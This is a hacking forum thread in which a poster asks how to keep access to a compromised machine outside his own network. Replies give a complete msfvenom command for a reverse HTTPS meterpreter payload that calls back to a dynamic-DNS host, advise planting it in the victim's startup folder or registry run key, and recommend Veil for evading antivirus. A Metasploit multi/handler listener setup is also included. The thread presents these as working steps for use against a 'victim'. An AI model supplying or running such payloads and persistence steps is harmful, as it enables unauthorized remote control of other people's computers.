Forum Thread: Persistence and Post-exploitation on system outside of LAN network?

Hello, it's been a while. It's been a while since I have posted on here, and I really want to get back and contribute to the community. I have been working on a lot of projects, and I am looking forward to spreading more knowledge and learning more as well.

Well, I guess I've been playing around with my household computers and sort of doing makeshift "labs".

Hypothetically, let's say I was able to compromise a system outside of my LAN network with metasploit. I portforwarded my port 4444 and set my listener so that the connection from the victim's external IP address (let's say 123.456.789) reaches my external IP, and because of the port fowarding, the connection goes to my machine where the listener is set up (let's say 192.168.1.187). I hope that didn't sound stupid BTW. I get a meterpreter session. I want to maintain access, but since it is outside of my network, what should I do so that I am able to come back to this system. For example, how can I implement a netcat backdoor, or the metsvc service, but for that particular system?

6 Responses

Glad to see you are back, Alan!

Have you tried the persistence script?

Thanks!

Would the persistence script only work on a local area network? Or with some extra configuration would it work on an external network?

Their are plenty of ways to gain persistence access,

you can put your binary in your victim startup folder, or if you cant access startup folder you can put your binary in temp folder and put entry in registry to run that file everyone the system turn on.

for outside the LAN you must have an static IP or if you dont have an static ip you need to setup a no-ip dynamic DNS, e.g (xyz.no-ip.info) so if your external ip is 123.456.789.111 then xyz.no-ip.info resolve to that IP.

Once you have created your no-ip dynamic dns, then move on to metasploit, and while creating payload in LHOST put xyz.no-ip.info.

use this payload :-

"msfvenom -a x86 --platform Windows -p windows/meterpreter/reversehttps LHOST=xyz.no-ip.infoLPORT=4444 SessionExpirationTimeout=0 SessionCommunicationTimeout=0 exitfunc=process -e x86/shikataganai -b '\x00\x0a\x0d' -f exe"

this will hopefully create your binary, then upload this binary to your victim PC, i prefer to uplaod into his/her startup folder. and run this once.

this payload will keep trying connection to your no-ip host address and this will be persistence.

hope it helps.

^^ do all that but use veil as shikataganai will most likely get caught by AV.

To reconnect to the persistence, do we have to be listening on metasploit but doing
Use multi/handler
set lport 443
set lhost 192.168.1.11
exploit -j

Does it need to be running in background? Or could we just let it listen without the -j?

thanks this is very usefull, and im wondering how post exploitation work over the lan. I mean how to portscan ? I know there is an Arp-scanner script, but how we can discover open ports form other machine, and try to pivoting?

Share Your Thoughts

  • Hot
  • Active